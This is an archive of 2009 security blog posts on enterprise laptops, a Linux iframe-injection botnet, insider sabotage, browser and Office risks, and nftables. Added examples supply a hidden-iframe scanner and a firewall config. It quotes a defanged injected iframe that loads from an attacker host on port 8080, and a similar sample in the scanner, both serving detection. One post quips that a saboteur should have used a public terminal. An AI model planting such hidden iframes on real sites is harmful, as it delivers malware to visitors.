October 5, 2009
Instant On Goes Corporate
DeviceVM Inc. is creating a new version of its instant-on Linux environment, Splashtop, aimed at laptop computers bought and managed by enterprise IT managers. Splashtop for Business can enable laptops to securely connect to corporate servers using virtual desktop infrastructure (VDI) technology compatible with those from Citrix Systems Inc. and VMware Inc., said Steve Rokov, senior director of enterprise marketing for the company.
Splashtop also includes components letting IT managers remotely set user policies and push out software updates, as well as delete user accounts or wipe data if the laptop is lost or stolen.
Well now this is a definite development. Safe transport and protection of product contents on handhelds and laptops has been a thorny issue for corporate entities. You can certainly encrypt. So that solves some of the problem. But when the device is stolen and the HDD or SSD is removed and placed in another machine, the thief has all the time in the world to crack the container. Yes, even TPM can be cracked by someone with sufficient skill.
The Splashtop approach is to VM the whole environment and encapsulate it. That provides a level of control separate from the main OS. No, it won’t solve the physical loss unless the IT shop moves very quickly. But it does wed the VM contents to the hardware. It ratchets up the skill level of intrusion. The thief now has to have the same mobo family that the BIOS was burned for.
More here.
Filed under Cloud Computing, Cutting Edge, Security, hardware by Dr. Dog
September 14, 2009
Not So Nice
I really don’t know where to go with this article. It’s a critical issue for Linux. Yet it does not look like a critical software flaw so much as improper administration. It has aspects for the client, yet again it’s not a hole, except for bad security administration again. –
The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.
The links look something like this:
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.
“It’s better to have both zombie clients and servers at the same time,” Sinegubko wrote in an instant message. “The heterogeneous system provides much more possibilities [and] makes the whole system more flexible.”
It’s unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It’s likely the zombie servers were compromised in the same fashion, he explained.
With about 100 nodes, the network is relatively small, making it unclear exactly what the attackers’ intentions are. All of the boxes examined so far have run the Apache webserver on various distributions of Linux, he said.
“Probably it’s some sort of proof-of-concept thing for hackers,” he wrote. “Or maybe they have many more other compromised servers waiting for their turn.”
So far, Sinegubko said, DynDNS.com and No-IP.com, the two dynamic hosting providers used by the attackers, have been commendably responsive in shutting down domains used in the attack. But he went on to say he is detecting about two new IP addresses every hour, an indication that this may not be the last we’ve heard of the phenomenon.
So first. If you have not reviewed your client security policies lately, I suggest you do so now. Yes, it’s a lot of work, but a heck of a lot less than having all your machines trashed. Second, on the server side, for those machines running web servers, do an nmap scan. Be alert for any HTTP service on port 8080. Question any group in your organization doing so as to the rationale of why. With the ease with which VMs can be built for testing purposes, there really is no reason to be using port 8080 on production machines for test. If you can’t get a valid reason for the need, shut it down.
At the code level, one might want to question why one is using iframes at all. There is one camp of web development that even questions the need for iframes if one is doing ‘proper’ CSS design. Something for a later philosophic discussion. But it might be worth the effort to run a script against your code base looking for an iframe with the “visibility: hidden” style set.
Last, I have not run across it yet. But a team needs to come up with procedural mapping to prevent these kinds of insertions. The hackers are finding machines with vulnerabilities. With the proper procedures in place this can be mitigated. But Linux is only as secure as you make it.
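Here is the kind of script the previous paragraphs suggest running over a code base. It is an added example, not part of the original post and not a tool from the article quoted above. It walks a directory of HTML/PHP files and flags iframes that are hidden by style (visibility:hidden or display:none), collapsed to zero size, or sourced from a host on port 8080, the three traits the injected tag above shows. The sample HTML, the directory layout and the evil.invalid hostname are constructed for illustration.

```python
"""Flag hidden iframes in a web code base (added example, not from the post).

Checks each <iframe> for the traits of the injected tag quoted above:
  * style hides it (visibility:hidden / display:none)
  * width or height is 0 or 1 pixel
  * src points at a non-standard port (8080 by default)
"""
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

# Ports worth a second look when an iframe loads from them (assumption).
SUSPICIOUS_PORTS = {8080}


class IframeFinder(HTMLParser):
    """Collects suspicious <iframe> tags with the line they start on."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []

        # Normalise the style string so "visibility: hidden" and
        # "visibility:hidden" compare equal.
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden-by-style")

        # A frame collapsed to 0 or 1 px is invisible even without CSS.
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower().rstrip("px")
            if val.isdigit() and int(val) <= 1:
                reasons.append(f"{dim}={val}")

        # Loading content from an unusual port (8080 in the campaign above).
        src = a.get("src", "")
        try:
            port = urlparse(src).port
        except ValueError:
            port = None
        if port in SUSPICIOUS_PORTS:
            reasons.append(f"src-port-{port}")

        if reasons:
            line, _ = self.getpos()
            self.findings.append({"line": line, "src": src, "reasons": reasons})


def scan_html(text):
    """Return a list of suspicious iframe findings for one document."""
    parser = IframeFinder()
    parser.feed(text)
    parser.close()
    return parser.findings


def scan_tree(root):
    """Scan every .html/.htm/.php file under root; map path -> findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php"}:
            hits = scan_html(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample page: one legitimate frame, two injected ones.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
<iframe src="http://evil.invalid:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
<iframe src="http://evil.invalid/x" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

Run it as `python hidden_iframes.py` to see the two flagged tags from the sample, or call `scan_tree("/var/www")` from a cron job and alert on any non-empty result; a legitimately hidden frame will show up too, so the output is a review list, not a verdict.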
July 16, 2009
If You Do IT, Do IT Right
A former support admin was sentenced to one year in prison after admitting he shut down the servers of a large IT company a few months after his employment ended there. Lesmany Nunez, 30, was an employee at Quantum Technology Partners in Miami from August 2006 to May 2007. Amazingly, he was able to breach the company’s network security in August 2007 using an administrator password, according to documents filed in federal court in Miami.
The former employee proceeded to change the passwords of all the IT admins and then shut down most of the company’s servers. He also deleted files that could have been used with backup tapes to repair some of the damage. The attack shut down Quantum’s network for almost a week, wreaking more than $30,000 in damages, prosecutors said.
His mistake, other than that he should not have done it to begin with? He did not use a public terminal if at all possible. There is another tale to this as well, of course. The firm did not use proper procedures. How could this guy have gotten in unless the IT MIS dude just never deleted the fella’s ID?
Filed under Commentary, Security by Dr. Dog
July 14, 2009
Got MS Office? Read on:
I once worked with a security genius whose bill rate exceeded that of the top ambulance chasers. He felt that selling security is like selling snake oil…success can be the luck of the draw. Beyond the vast number of recommendations he typically made, he also had a favorite fix: Use the stuff most of the rest of the world does not use, therefore improving your odds. In this case, most of the world uses MS Office, making it the most attractive target for people who would use its vulnerabilities to steal from you.
Microsoft Corp warned that cybercriminals have attacked users of its Office software for Windows PCs, exploiting a programming flaw that the software giant has yet to repair.
The world’s largest software maker issued the warning on Tuesday as it released patches to address nine other security holes in its software. (Yahoo)
Is Open Office or one of its variants less vulnerable than the Microsoft suite? Probably not. There are far fewer people using it, so it’s much less profitable to exploit it. That should be justification enough for you to give it a try.
Filed under Security by admin
June 23, 2009
Clearly a Bad Idea
Remember Clear? You know, the company that was going to permit you to jump to the head of the line at the TSA screening stations at airports. Yeah, those guys. Well, it’s tits up. They closed their doors yesterday, having been unable to reach an agreement with senior creditors.
The idea for Clear was you provided your personal data beforehand so that prescreening did not have to take place. For your forethought you got a chance to bypass all the unwashed and go to the head of the line. Made sense when the lines were first implemented.
The reality is, though, someone paid $100 to bypass one single checkpoint. So a Clear customer paid for the right to be first in line to be abused by the TSA. How special. That Clear customer still had to take off their shoes, belt, empty their pockets, get hand scanned, etc. So in the end it was a flawed concept.
Filed under Applications, Security by Dr. Dog
June 15, 2009
Chinese Accused of Stealing Filter
Solid Oak is seeking an injunction against the Chinese developer of Green Dam, Jinhui Computer System Engineering Inc, but its chances of gaining satisfaction must be reckoned to be fairly slim. So, it’s no surprise it is also seeking injunctions against US PC vendors who follow Beijing’s directive that any machines they ship in China must carry the software.
“They are stealing proprietary copyrighted material from us, sending it over to the US and saying, ‘We want this on all the computers you send us’,” Solid Oak president Brian Milburn told Reuters. “Just because we are a small company doesn’t make the theft of CyberSitter any less [wrong].”
Milburn told Reuters he had been tipped off via an anonymous email. “We found actual proprietary code areas within the Green Dam program itself which are incredibly suspicious because they use our proprietary encryption methods. There’s a lot more to it than just a list of bad words.”
Heinous if true. Not that it would cause the Chinese much heartache. Even if Solid Oak were to win a class-wide injunction here in the US, the Chinese would just use internal suppliers like Lenovo to meet their needs and continue to use the pirated components.
But very rapidly the bamboo curtain is falling again.
Filed under Applications, Cutting Edge, Networking, Security, commercial software by Dr. Dog
April 29, 2009
Microsoft Tightens Up Some
Beginning with Release Candidate 1 of Windows 7, the operating system will no longer display AutoRun when most removable media is connected. Up to now, the feature has automatically opened a window each time a drive is connected that presents a list of tasks the user can instruct Windows to carry out. Malware purveyors have long manipulated the feature to display options that say things like “open folder to view files” but install malware when clicked instead. “With these changes, if you insert a USB flash drive that has photos and has been infected by malware, you can be confident that the tasks displayed are all from software already on your computer,” Arik Cohen, a program manager on Microsoft’s core user experience team, writes here. The changes eventually will be added to Vista and XP.
Excellent move, Microsoft. Yes, it’s a minor thing but one that is long overdue. The ease of manipulation that that panel offered was a gripe by many a tech.
Nor is this minor peeve limited to Microsoft. Ubuntu and other Linux distros will do this too. The saving grace is that Linux is more immune to such attacks.
Filed under Applications, Microsoft, Security, Storage by Dr. Dog
April 21, 2009
Companies Heal Thy Self!
We have railed several times here that folks should be ditching IE 6 for all its security flaws. Well, it looks like it’s working. Companies, on the other hand? Well, not so much –
This graph is from the folks over at the Washington Times. They are big Open Source adherents. WT has had an ongoing campaign to get folks off IE6. They want to sunset it as a supported platform. Notice the pattern? –
I shaded the weekends to make it more obvious, but there is a regular dip in the percentage of IE6 traffic on weekends with a regular increase of Firefox 3 traffic. My interpretation is that while at work, people are browsing our site using whatever is installed on their work computers: IE 6. But when they are home, they use what they prefer: Firefox 3. Internet Explorer 7 usage is fairly stable.
Some good news is that it appears to be working: IE 6 usage is slowly dropping. However, it also appears that Firefox 3 usage (as a percentage) is dropping. This is probably a conversion of IE 6 to IE 7 usage. There is also evidence that there is some upgrading happening at work as the regular weekend drop is starting to appear in IE 7.
So this is a note to the CEO of every company. Have you inquired with your technical staff lately as to whether IE6 is in use? You ought to. IE6 is causing your staff massive headaches by being open to worm and virus attacks. So before you approve another malware upgrade, get to the root and flush IE 6 first.
Kudos to the Washington Times.
Filed under Applications, Open Source, Security by Dr. Dog
March 29, 2009
Have You Considered What Twitter Represents?
No seriously, have you? Ok. Yes. But, ‘communications’ is just such a broad term. I could use email in the same breath. Now think again.
Stumped? How about — Voyeur.
Like Damn, you say. Ok, I’ll agree it’s an extreme example. But it has all the attributes. Observing unseen? Check. Assessing content? Check. A one way event? Check. Has possible social impacts? Check. The only thing that makes Twitter any different is that the person being observed does so voluntarily.
Funny how a highly popular electronic service used by millions elicits no concerns. Were Twitter a physical event in the real world it could be arrested in about half the States of the US. I am just waiting for somebody to write a mobile phone worm that links an anonymous Twitter account to the GPS circuit of the phone.
Hmmmmm.
[Update] For a different view of Twitter and some of its users, consider this.
Filed under Applications, Mobile Devices, Security, new technology by Dr. Dog
March 22, 2009
Linux Getting New Firewall Design
The Netfilter development team’s Patrick McHardy has released an alpha version of nftables, a new firewall implementation for the Linux kernel, with a user space tool for controlling the firewall. nftables introduces a fundamental distinction between the user space defined rules and network objects in the kernel: the kernel component works with generic data such as IP addresses, ports and protocols and provides some generic operations for comparing the values of a packet with constants or for discarding a packet. Firewall rules, which the user defines with the nft tool, are checked by the nft program for correctness and then translated into the required generic operations and kernel objects. A first impression of the examples in the announcement shows nftables to have a different syntax from iptables. The rules can be added either incrementally on the command line, or read from a file with nft supporting rule files, which can import and include other rules files for easier modularisation.
Dang! Just when I got the IPTables system all figured out!
Seriously, it’s probably a good change once they get the system stable. The ability to separate system level filter rules from user space rules will be a nice feature. It should make customized server security a tad easier. And I doubt that IPTables is going away anytime soon. It will probably be in the repositories of most major systems for years.
More here.
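To show what the rule-file-plus-include modularisation described above looks like in practice, here is an added example written in the nftables syntax as it eventually stabilised, not the 2009 alpha syntax from the announcement and not code from the Netfilter project’s own examples. The file paths, the address range and the set names are hypothetical. The main file pulls a small definitions file in with `include`, so the host-specific values live apart from the generic chain logic; as a nod to the port 8080 post above, the ruleset also logs and drops anything that arrives on that port.

```nft
#!/usr/sbin/nft -f
# Hypothetical /etc/nftables.conf for a web server (added example).
# Load with: nft -f /etc/nftables.conf

flush ruleset

# Site-specific values are kept in a separate file and included here, so
# the chain logic below can be reused on other hosts unchanged.
include "/etc/nftables.d/webserver-defs.nft"

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;

        # Allow replies to connections this host opened; drop junk.
        ct state established,related accept
        ct state invalid drop

        # Loopback is always fine.
        iif "lo" accept

        # Public web ports and admin SSH from the management network only.
        tcp dport $web_ports accept
        ip saddr $admin_nets tcp dport 22 accept

        # Port 8080 is deliberately not a service here; record and drop it.
        tcp dport 8080 log prefix "nft-unexpected-8080: " drop
    }
}

# ---- /etc/nftables.d/webserver-defs.nft (hypothetical included file) ----
# define web_ports = { 80, 443 }
# define admin_nets = { 192.0.2.0/24 }
```

The `define` lines are shown as comments only because both files are presented in one listing; in the included file they are plain statements. Because `nft -f` parses the whole file before touching the kernel, a typo in either file rejects the load as a unit rather than leaving a half-applied policy, which is the user space validation step the announcement describes.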
Filed under Applications, Linux, Security by Dr. Dog